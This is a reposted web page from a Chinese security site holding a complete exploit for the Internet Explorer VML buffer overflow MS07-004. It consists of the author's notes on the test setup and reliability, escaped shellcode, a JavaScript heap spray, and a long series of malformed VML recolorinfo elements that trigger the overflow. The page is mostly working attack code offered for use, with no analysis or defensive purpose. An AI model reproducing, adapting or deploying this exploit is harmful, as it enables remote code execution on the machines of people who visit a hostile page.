黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

MS Internet Explorer VML Remote Buffer Overflow Exploit (MS07-004)

2009-2-4 13:23| 投稿: security


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 另外还有注意说明:tested on WinXP SP2 Korean version( fully patched except kb929969) & IE 6.0sorry about ...
另外还有注意说明:tested on WinXP SP2 Korean version( fully patched except kb929969) & IE 6.0sorry about that exploit hit ratio is only about 1/5测试环境 WinXP SP2 韩文版,除了 kb929969 外,其他补丁齐全,IE 6.0成功率只有1/5 <!-- MS07-004 VML integer overflow exploit by lifeasageek at gmail.com - Trigger CVMLRecolorinf:InternalLoad() method you can see the screen captured image "http://picasaweb.google.com/lifeasageek/MS07004/photo?pli=1#5019163989136880322" which is generated by DarunGrim - tested on WinXP SP2 Korean version( fully patched except kb929969) & IE 6.0 and I hope it works well in English version - sorry about that exploit hit ratio is only about 1/5 If you have any good idea to improve reliability, please send me ane-mail with your idea - all the java script codes scratched from MS06-055 exploit written by Trirat Puttaraksa (Kira) <trir00t [at] gmail.com> and slightly modified - 2007.1.15 --> <html xmlns:v="urn:schemas-microsoft-com:vml"> <head><object id="VMLRender"classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object><style>v\:* { behavior: url(#VMLRender); }</style></head> <body> <SCRIPT language="javascript">shellcode =unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); bigblock = unescape("%u0505%u0505");headersize = 20;slackspace = headersize+shellcode.length;while (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length-slackspace);while(block.length+slackspace<0x40000) block = block+block+fillblock;memory = new Array();for (i=0;i<350;i++) memory[i] = block + shellcode; </script> <v:rect style='width:120pt;height:80pt' fillcolor="red" ><v:recolorinfo recolorstate="t" numcolors="97612895"> <v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v/recolorinfo></html>

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部